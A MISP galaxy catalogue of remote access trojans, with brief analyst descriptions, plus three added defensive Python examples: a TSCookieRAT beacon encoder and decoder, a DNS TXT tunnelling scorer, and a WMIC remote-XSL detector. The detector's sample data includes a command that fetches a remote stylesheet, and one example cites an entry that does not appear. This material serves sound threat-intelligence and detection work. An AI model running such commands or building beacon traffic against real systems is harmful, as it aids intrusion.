UUID e0bea149-2def-484f-b658-f782a4f94815 which can be used as unique global reference for FALLCHILL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

UBoatRAT

Palo Alto Networks Unit 42 has identified attacks with a new custom Remote Access Trojan (RAT) called UBoatRAT. The initial version of the RAT, found in May 2017, was a simple HTTP backdoor that used a public blog service in Hong Kong and a compromised web server in Japan for command and control. The developer soon added new features to the code and released an updated version in June. The attacks with the latest variants, found in September, have the following characteristics:

Target personnel or organizations related to South Korea or the video games industry
Distribute malware through Google Drive
Obtain the C2 address from GitHub
Use the Microsoft Windows Background Intelligent Transfer Service (BITS) to maintain persistence

Internal MISP references

UUID 03694200-80c2-433d-9797-09eafcad1075 which can be used as unique global reference for UBoatRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

CrossRat

The EFF/Lookout report describes CrossRat as a “newly discovered desktop surveillanceware tool…which is able to target Windows, OSX, and Linux.”

Internal MISP references

UUID 696125b9-7a91-463a-9e6b-b4fc381b8833 which can be used as unique global reference for CrossRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

TSCookieRAT

TSCookie provides parameters such as C&C server information when loading TSCookieRAT. Upon execution, information about the infected host is sent to an external server in an HTTP POST request (the HTTP header format is the same as TSCookie's). The data is RC4-encrypted from the beginning to offset 0x14 (the key is the Date header value), followed by the information about the infected host (host name, user name, OS version, etc.). See Appendix C, Table C-1 of the JPCERT/CC report for the data format.
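
The beacon structure described above (RC4 over the first 0x14 bytes, keyed with the HTTP Date header value, followed by host information) can be reproduced for analysis work. The following is an added example, not TSCookie code: it implements textbook RC4 and builds and parses a constructed POST body. The layout of the 0x14-byte header in the real sample is documented in Appendix C of the JPCERT/CC report and is not reproduced here; the example treats it as an opaque 20-byte prefix, and the null-separated host-info fields, the Date value and the host details are all constructed assumptions.

```python
HEADER_LEN = 0x14  # only the first 20 bytes of the POST body are RC4-encrypted


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling + keystream). Symmetric: one function encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def build_beacon(date_header: str, header: bytes, host_info: bytes) -> bytes:
    """Assemble a body the way the report describes: RC4(header, key=Date) || host info."""
    if len(header) != HEADER_LEN:
        raise ValueError("header must be exactly 0x14 bytes")
    return rc4(date_header.encode("ascii"), header) + host_info


def parse_beacon(date_header: str, body: bytes) -> dict:
    """Decrypt the 0x14-byte prefix with the request's own Date header and split the host info."""
    if len(body) < HEADER_LEN:
        raise ValueError("body shorter than the encrypted header")
    key = date_header.encode("ascii")
    header = rc4(key, body[:HEADER_LEN])
    # Assumed null-byte field separator for the constructed host-info block;
    # the real layout is in Appendix C of the JPCERT/CC report.
    fields = [f.decode("utf-8", "replace") for f in body[HEADER_LEN:].split(b"\x00") if f]
    return {"header": header, "fields": fields}


# Constructed request pieces; none of these values come from a real sample.
DATE = "Tue, 01 May 2018 12:34:56 GMT"
HEADER = bytes(range(HEADER_LEN))                      # opaque 20-byte header stand-in
HOST_INFO = b"WIN-LAB01\x00analyst\x00Windows 7 SP1\x00"

if __name__ == "__main__":
    body = build_beacon(DATE, HEADER, HOST_INFO)
    print(body[:HEADER_LEN].hex(), parse_beacon(DATE, body))
```

The operational point is that the key is taken from the request's own Date header: a capture that kept only the POST body cannot be decoded, so retain full HTTP headers when collecting this traffic, and expect a fresh keystream for every request.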

Internal MISP references

UUID 7b107b46-4eca-11e8-b89f-0366ae765ddd which can be used as unique global reference for TSCookieRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Coldroot

Coldroot, a remote access trojan (RAT), is still undetectable by most antivirus engines, despite being uploaded and freely available on GitHub for almost two years. The RAT appears to have been created as a joke, "to Play with Mac users," and "give Mac it's rights in this [the RAT] field," but has since expanded to work on all three major desktop operating systems (Linux, macOS and Windows), according to a screenshot of its builder extracted from a promotional YouTube video.

Internal MISP references

UUID 86f1f048-4eca-11e8-a08e-7708666ace6e which can be used as unique global reference for Coldroot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Comnie

Comnie is a RAT originally identified by Sophos. It has been using GitHub, Tumblr and Blogspot as covert channels for its C2 communications. Comnie has been observed targeting the government, defense, aerospace, high-tech and telecommunication sectors in Asia.

Internal MISP references

UUID d14806fe-4ecb-11e8-a120-ff726de6a4d3 which can be used as unique global reference for Comnie in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

GravityRAT

GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We've seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor.

Internal MISP references

UUID 2d356870-4ecd-11e8-9bb8-e3ba5aa7da31 which can be used as unique global reference for GravityRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

ARS VBS Loader

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim's machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious "loaders".

Internal MISP references

UUID cd6527d1-17a7-4825-8b4b-56e113d0efb1 which can be used as unique global reference for ARS VBS Loader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

RadRAT

RadRAT's capabilities include: unfettered control of the compromised computer, lateral movement across the organization (Mimikatz-like credential harvesting, NTLM hash harvesting from the Windows registry and a Pass-the-Hash attack on SMB connections) and rootkit-like detection-evasion mechanisms.

Internal MISP references

UUID 5a3df9d7-82de-445e-a218-406b970600d7 which can be used as unique global reference for RadRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

FlawedAmmyy

FlawedAmmyy, has been used since the beginning of 2016 in both highly targeted email attacks as well as massive, multi-million message campaigns. The RAT is based on leaked source code for Version 3 of the Ammyy Admin remote desktop software. As such FlawedAmmyy contains the functionality of the leaked version, including: Remote Desktop control, File system manager, Proxy support, Audio Chat.

Internal MISP references

UUID 3c1003a2-8364-467a-b9b8-fcc19724a9b5 which can be used as unique global reference for FlawedAmmyy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

Spymaster Pro

Monitoring Software

Internal MISP references

UUID e9f9d900-4f9a-11e8-bce9-4bfbb0e9ab4c which can be used as unique global reference for Spymaster Pro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

NavRAT

A classic RAT that can download and upload files, execute commands on the victim host and perform keylogging. Its command and control (C2) infrastructure, however, is very specific: it uses the legitimate Naver email platform to communicate with the attackers via email.

Internal MISP references

UUID 6ea032a0-d54a-463b-b016-2b7b9b9a5b7e which can be used as unique global reference for NavRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

joanap

Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device.

Internal MISP references

UUID caac1aa2-6982-11e8-8107-a331ae3511e7 which can be used as unique global reference for joanap in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Sisfader

Sisfader maintains persistence installing itself as a system service, it is made up of multiple components ([1] Dropper - installing the malware, [2] Agent - main code of the RAT, [3] Config - written to the registry, [4] Auto Loader - responsible for extracting the Agent, the Config from the registry) and it has its own custom protocol for communication.

Internal MISP references

UUID b533439d-b060-4c90-80e0-9dce67b0c6fb which can be used as unique global reference for Sisfader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

SocketPlayer

The RAT is written in .NET, it uses socket.io for communication. Currently there are two variants of the malware, the 1st variant is a typical downloader whereas the 2nd one has download and C2 functionalities.

Internal MISP references

UUID d9475765-2cea-45c0-b638-a082b9427239 which can be used as unique global reference for SocketPlayer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Hallaj PRO RAT

RAT

Internal MISP references

UUID f6447046-f4e8-4977-9cc3-edee74ff0038 which can be used as unique global reference for Hallaj PRO RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

NukeSped

This threat can install other malware on your PC, including Trojan:Win32/NukeSped.B!dha and Trojan:Win32/NukeSped.C!dha. It can show you a warning message that says your files will be made publicly available if you don't follow the malicious hacker's commands.

Internal MISP references

UUID 5d0369ee-c718-11e8-b328-035ed1bdca07 which can be used as unique global reference for NukeSped in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

TheOneSpy

Remotely monitor and control any wrong activity of kids on all smartphones & computers

Internal MISP references

UUID da5feaef-d96f-46e2-aad7-bd2745801048 which can be used as unique global reference for TheOneSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

BONDUPDATER

BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization. The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.
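
Both BONDUPDATER and the DNSMessenger entry above rely on the same trick: the query name carries data out and the TXT answer carries data in, so the traffic looks like many TXT queries with long, high-entropy, rarely repeated prefixes under one registrable domain. The following is an added example, not code from either malware family or from the vendors that analyzed them: it aggregates constructed resolver log lines per domain and flags tunnelling-shaped TXT traffic. The log format, the thresholds and the "last two labels" registrable-domain rule are assumptions; a real deployment needs a public-suffix list and an allowlist for legitimate TXT-heavy senders (SPF/DKIM/DMARC checks, some security products' own DNS-based telemetry).

```python
import math
from collections import defaultdict

# Constructed resolver log, one query per line: "<epoch> <client> <qtype> <qname>".
# This is not the output format of any particular resolver or sensor.
SAMPLE_LOG = """\
1520000000 10.0.0.5 A www.example.com
1520000001 10.0.0.5 TXT _dmarc.example.com
1520000002 10.0.0.7 TXT _dmarc.example.com
1520000003 10.0.0.5 TXT example.com
1520000004 10.0.0.7 TXT example.com
1520000005 10.0.0.9 TXT _dmarc.example.com
1520000010 10.0.0.5 TXT abcdefghijklmnopqrstuvwxyz234567.c2example.net
1520000011 10.0.0.5 TXT bcdefghijklmnopqrstuvwxyz234567a.c2example.net
1520000012 10.0.0.5 TXT cdefghijklmnopqrstuvwxyz234567ab.c2example.net
1520000013 10.0.0.5 TXT defghijklmnopqrstuvwxyz234567abc.c2example.net
1520000014 10.0.0.5 TXT efghijklmnopqrstuvwxyz234567abcd.c2example.net
1520000015 10.0.0.5 TXT fghijklmnopqrstuvwxyz234567.abcde.c2example.net
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded command/result chunks score far higher than hostnames."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(qname: str) -> str:
    """Assumption: the last two labels are the registrable domain (no public-suffix list here)."""
    return ".".join(qname.split(".")[-2:])


def parse_line(line: str) -> dict:
    ts, client, qtype, qname = line.split()
    return {"ts": int(ts), "client": client, "qtype": qtype.upper(),
            "qname": qname.lower().rstrip(".")}


def score_txt_tunneling(lines, min_queries=5, min_prefix_len=20, min_entropy=3.0,
                        min_unique_ratio=0.8) -> list:
    """Aggregate TXT queries per registrable domain and flag tunnelling-shaped traffic.

    Thresholds are assumptions; tune them against your own baseline before alerting.
    """
    stats = defaultdict(lambda: {"n": 0, "prefixes": set(), "lens": [], "ents": [], "clients": set()})
    for raw in lines:
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        rec = parse_line(raw)
        if rec["qtype"] != "TXT":
            continue
        base = registrable_domain(rec["qname"])
        prefix = rec["qname"][: len(rec["qname"]) - len(base)].rstrip(".")  # labels left of the domain
        st = stats[base]
        st["n"] += 1
        st["prefixes"].add(prefix)
        st["lens"].append(len(prefix))
        st["ents"].append(shannon_entropy(prefix.replace(".", "")))
        st["clients"].add(rec["client"])

    findings = []
    for base, st in stats.items():
        if st["n"] < min_queries:
            continue
        avg_len = sum(st["lens"]) / st["n"]
        avg_ent = sum(st["ents"]) / st["n"]
        uniq = len(st["prefixes"]) / st["n"]
        if avg_len >= min_prefix_len and avg_ent >= min_entropy and uniq >= min_unique_ratio:
            findings.append({"domain": base, "txt_queries": st["n"],
                             "avg_prefix_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2),
                             "unique_ratio": round(uniq, 2), "clients": sorted(st["clients"])})
    return findings


if __name__ == "__main__":
    for finding in score_txt_tunneling(SAMPLE_LOG.splitlines()):
        print(finding)
```

The three features are deliberately combined: long prefixes alone catch CDNs and tracking hosts, high entropy alone catches legitimate hashed hostnames, and a high unique-prefix ratio alone catches caching artifacts, but a domain that scores on all three with sustained TXT volume is rarely benign. Run it over a day of resolver logs per client rather than per network once it is tuned, since a single infected host is the usual shape of these campaigns.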

Internal MISP references

UUID ef9f1592-0186-4f5d-a8ea-6c10450d2219 which can be used as unique global reference for BONDUPDATER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

FlawedGrace

Proofpoint also points out that FlawedGrace is a full-featured RAT written in C++ and that it is a very large program that makes "extensive use of object-oriented and multithreaded programming techniques. As a consequence, getting familiar with its internal structure takes a lot of time and is far from a simple task."

Internal MISP references

UUID 428c8288-6f65-453f-bfa2-4b519d08f8e9 which can be used as unique global reference for FlawedGrace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

H-worm

H-worm is a VBS (Visual Basic Script) based RAT written by an individual going by the name Houdini. We believe the author is based in Algeria and has connections to njq8, the author of njw0rm [1] and njRAT/LV [2] through means of a shared or common code base. We have seen the H-worm RAT being employed in targeted attacks against the international energy industry; however, we also see it being employed in a wider context as run of the mill attacks through spammed email attachments and malicious links.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular H-worm.

Known Synonyms
Dunihi
Houdini
WSHRat
Internal MISP references

UUID 1b6a067b-50b9-4aa7-a49b-823e94e210fe which can be used as unique global reference for H-worm in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

Parasite-HTTP-RAT

The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections. The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Parasite-HTTP-RAT.

Known Synonyms
Parasite HTTP
Internal MISP references

UUID 1b6a067c-50ba-4aa7-a59b-824e94e210fe which can be used as unique global reference for Parasite-HTTP-RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Caesar RAT

Caesar is an HTTP-based RAT that allows you to remotely control devices directly from your browser.

Internal MISP references

UUID 1b6a066c-50ba-4aa6-a49b-823e94e110fe which can be used as unique global reference for Caesar RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

FlawedAmmy

During the month of October, Check Point researchers discovered a widespread malware campaign spreading a remote access trojan (dubbed “FlawedAmmy”) that allows attackers to take over victims’ computers and data. The campaign was the latest and most widespread delivering the ‘FlawedAmmyy’ RAT, following a number of campaigns that have spread this malware in recent months. The Trojan allows attackers to gain full access to the machine’s camera and microphone, collect screen grabs, steal credentials and sensitive files, and intrusively monitor the victims’ actions. As a result, FlawedAmmy is the first RAT to enter the Global Threat Index’s top 10 ranking.

Internal MISP references

UUID 4b9b99f0-9c2d-4db5-aaff-09de88509c04 which can be used as unique global reference for FlawedAmmy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Felipe

The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.

Internal MISP references

UUID 0f117f50-9657-11e9-8e2b-83e391e0ce57 which can be used as unique global reference for Felipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Amavaldo Banking Trojan

Amavaldo is a banking trojan written in Delphi and known to target Spanish- and Portuguese-speaking countries. It contains backdoor functionality and can operate in multiple stages. Amavaldo also abuses legitimate tools and software.

Internal MISP references

UUID 39c65b1d-7799-43d6-a963-4a058b1c756e which can be used as unique global reference for Amavaldo Banking Trojan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2019

AsyncRAT

Open-Source Remote Administration Tool For Windows C# (RAT)

Internal MISP references

UUID 1b6a065c-40ba-4aa5-a46b-813e74e010fe which can be used as unique global reference for AsyncRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

InnfiRAT

A new RAT called InnfiRAT, written in .NET and designed to perform specific tasks on an infected machine.

Internal MISP references

UUID 1b4a085c-30bb-5aa5-b46a-803e94e010ff which can be used as unique global reference for InnfiRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

KeyBase

In the wild since February 2015. The malware comes equipped with a variety of features and can be purchased for $50 directly from the author. It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.

Internal MISP references

UUID b3cfd21f-b637-42ff-b118-2803630b718a which can be used as unique global reference for KeyBase in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Warzone

Apparently existing since 2018

Internal MISP references

UUID bbff39cb-a12b-4b18-be20-aa9e6d378fa6 which can be used as unique global reference for Warzone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

SDBbot

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence. SDBbot is composed of three pieces: an installer, a loader, and a RAT component.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SDBbot.

Known Synonyms
SDB bot
Internal MISP references

UUID 9d36db93-7d60-4da6-a611-1a32e02a054f which can be used as unique global reference for SDBbot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Sepulcher

A China-based APT has been sending organizations spear-phishing emails that distribute a never-before-seen intelligence-collecting RAT dubbed Sepulcher.

Researchers discovered the new malware being distributed over the past six months through two separate campaigns. The first, in March, targeted European diplomatic and legislative bodies, non-profit policy research organizations and global organizations dealing with economic affairs. The second, in July, targeted Tibetan dissidents. They tied the campaigns to APT group TA413, which researchers say has been associated with Chinese state interests and is known for targeting the Tibetan community.

“Based on the use of publicly known sender addresses associated with Tibetan dissident targeting and the delivery of Sepulcher malware payloads, [we] have attributed both campaigns to the APT actor TA413,” said Proofpoint researchers in a Wednesday analysis. “The usage of publicly known Tibetan-themed sender accounts to deliver Sepulcher malware demonstrates a short-term realignment of TA413’s targets of interest.”

Internal MISP references

UUID d0ed7527-cd1b-4b05-bbac-2e409ca46104 which can be used as unique global reference for Sepulcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Guildma

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages containing a ZIP archive attachment with a malicious LNK file. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool and silently downloads a malicious XSL file. The XSL file downloads all of Guildma’s modules and executes a first stage loader, which loads the rest of the modules. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening a webpage of one of the targeted banks.
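
The first stage of the chain above, a LNK file that launches the WMI command-line tool to pull a remote XSL file, leaves a distinctive process-creation trail: wmic.exe with a /format: argument that names a URL or a stylesheet outside the system wbem directory. The following is an added example, not Guildma code or any vendor's detection rule: it classifies constructed process-creation records, whose field names borrow Sysmon Event ID 1 vocabulary (Image, CommandLine, ParentImage). The built-in format list, the parent-process list and the sample records (including the 203.0.113.7 address) are assumptions and constructed data.

```python
import re

# /format:<x> or /format=<x>, optionally quoted; captures the stylesheet reference.
FORMAT_RE = re.compile(r"/format\s*[:=]\s*\"?([^\s\"]+)", re.IGNORECASE)
# URL schemes and UNC paths: wmic should not be fetching stylesheets from these.
REMOTE_RE = re.compile(r"^(https?|ftp)://|^\\\\", re.IGNORECASE)
WBEM_DIR = "\\system32\\wbem\\"
# Output formats whose .xsl ships in the wbem directory (assumed, non-exhaustive list).
BUILTIN_FORMATS = {"list", "csv", "table", "htable", "hform", "xml", "rawxml",
                   "mof", "texttable", "textvaluelist"}
# Parents that fit a LNK/script-driven launch rather than an admin at a console.
SCRIPT_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def classify_wmic(record: dict):
    """Return a finding for a suspicious WMIC process-creation record, or None if it looks benign."""
    if not record.get("Image", "").lower().endswith("\\wmic.exe"):
        return None
    m = FORMAT_RE.search(record.get("CommandLine", ""))
    if not m:
        return None
    target = m.group(1).strip("'\"")
    tl = target.lower()
    basename = tl.replace("/", "\\").rsplit("\\", 1)[-1]
    fmt = basename[:-4] if basename.endswith(".xsl") else basename

    reasons = []
    if REMOTE_RE.match(tl):
        reasons.append("stylesheet fetched from a remote location")
    elif "\\" in tl and WBEM_DIR not in tl:
        reasons.append("stylesheet outside %SystemRoot%\\System32\\wbem")
    elif fmt not in BUILTIN_FORMATS:
        reasons.append("unknown format name, may resolve to an attacker-supplied .xsl")
    if not reasons:
        return None

    parent = record.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if parent in SCRIPT_PARENTS:
        reasons.append(f"launched from {parent}")
    return {
        "ProcessId": record.get("ProcessId"),
        "target": target,
        "severity": "high" if reasons[0].startswith("stylesheet fetched") else "medium",
        "reasons": reasons,
    }


def scan(events) -> list:
    """Run the classifier over a batch of process-creation records."""
    return [f for f in (classify_wmic(e) for e in events) if f]


# Constructed records: one benign admin query, one remote-XSL fetch, one local non-wbem XSL, one non-wmic.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic os get /format:list",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"ProcessId": 5532, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "WMIC.exe os get /FORMAT:\"https://203.0.113.7/v2/calc.xsl\"",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": 6001, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic process list /format:C:\\Users\\Public\\out.xsl",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"ProcessId": 6100, "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The rule is narrow on purpose: it does not alert on wmic.exe itself, which administrators run constantly, only on the stylesheet argument, which is the part the attacker controls. Pair it with egress logging, since the same hosts will also show wmic.exe (or the WMI provider host) making the HTTP request for the XSL.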

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Guildma.

Known Synonyms
Astaroth
Internal MISP references

UUID 833ed94d-97c1-4b57-9634-c27bf42eb867 which can be used as unique global reference for Guildma in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Milan

Milan is a 32-bit RAT written in Visual C++ and .NET. Milan is loaded and persists using tasks. An encoded routine waits for three to four seconds between executing the first task, deleting this task, and setting a second scheduled task for persistence.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Milan.

Known Synonyms
James
Internal MISP references

UUID a5e5a48a-5ce7-45f0-97d7-517d7f37b4ce which can be used as unique global reference for Milan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DarkWatchman

In late November, Prevailion's Adversarial Counterintelligence Team (PACT) identified what appeared to be a malicious JavaScript-based Remote Access Trojan (RAT) that uses a robust Domain Generation Algorithm (DGA) to identify its Command and Control (C2) infrastructure and that utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation. This RAT, which PACT refers to by its internal codename "DarkWatchman", has been observed being distributed by email and represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools. PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor's (TA) web-based infrastructure, and consolidated the results of its analysis into the following report.

Internal MISP references

UUID 35198ca6-6f8d-49cd-be1b-65f21b2e7e00 which can be used as unique global reference for DarkWatchman in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Ragnatela

Malwarebytes Lab identified a new variant of the BADNEWS RAT called Ragnatela. It is being distributed via spear phishing emails to targets of interest in Pakistan. Ragnatela, which means spider web in Italian, is also the project name and panel used by Patchwork APT. Ironically, the threat actor infected themselves with their own RAT.

Internal MISP references

UUID e79cb167-6639-46a3-9646-b12535aa21b6 which can be used as unique global reference for Ragnatela in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

STRRAT

STRRAT is a Java-based RAT with a JavaScript wrapper/dropper that was discovered in 2020. Its core payload (a .JAR file) is contained under several layers of obfuscation and encoding inside the JavaScript wrapper/dropper.

STRRAT is propagated by malicious email attachments. Its capabilities include standard RAT functionalities (remote access, remote command execution), browser and email-client credential harvesting, and a unique ransomware-like functionality – if instructed, it will add a “.crimson” extension to files on the device, rendering them inoperable (though they can be easily recovered because their content is not modified).

Unlike many Java-based malware families, STRRAT does not require Java to be installed on the infected system in order to operate. When the JavaScript wrapper/dropper is executed, if a suitable Java runtime installation is not found, one is downloaded and installed to ensure the contained Java payload can execute.

Internal MISP references

UUID b30cb6f4-1e0a-4a97-8d88-ca38f83b4422 which can be used as unique global reference for STRRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

COATHANGER

Chinese FortiGate RAT. The COATHANGER malware is a remote access trojan (RAT) designed specifically for Fortigate appliances. It is used as second-stage malware, and does not exploit a new vulnerability. Intelligence services MIVD & AIVD refer to the malware as COATHANGER based on a string present in the code.

The COATHANGER malware is stealthy and persistent. It hides itself by hooking system calls that could reveal its presence. It survives reboots and firmware upgrades.

MIVD & AIVD assess with high confidence that the malicious activity was conducted by a state-sponsored actor from the People’s Republic of China. This is part of a wider trend of Chinese political espionage against the Netherlands and its allies.

MIVD & AIVD assess that use of COATHANGER may be relatively targeted. The Chinese threat actor(s) scan for vulnerable edge devices at scale and gain access opportunistically, and likely introduce COATHANGER as a communication channel for select victims.

Internal MISP references

UUID c04e9738-de62-43e4-b645-2e308c1f77f7 which can be used as unique global reference for COATHANGER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value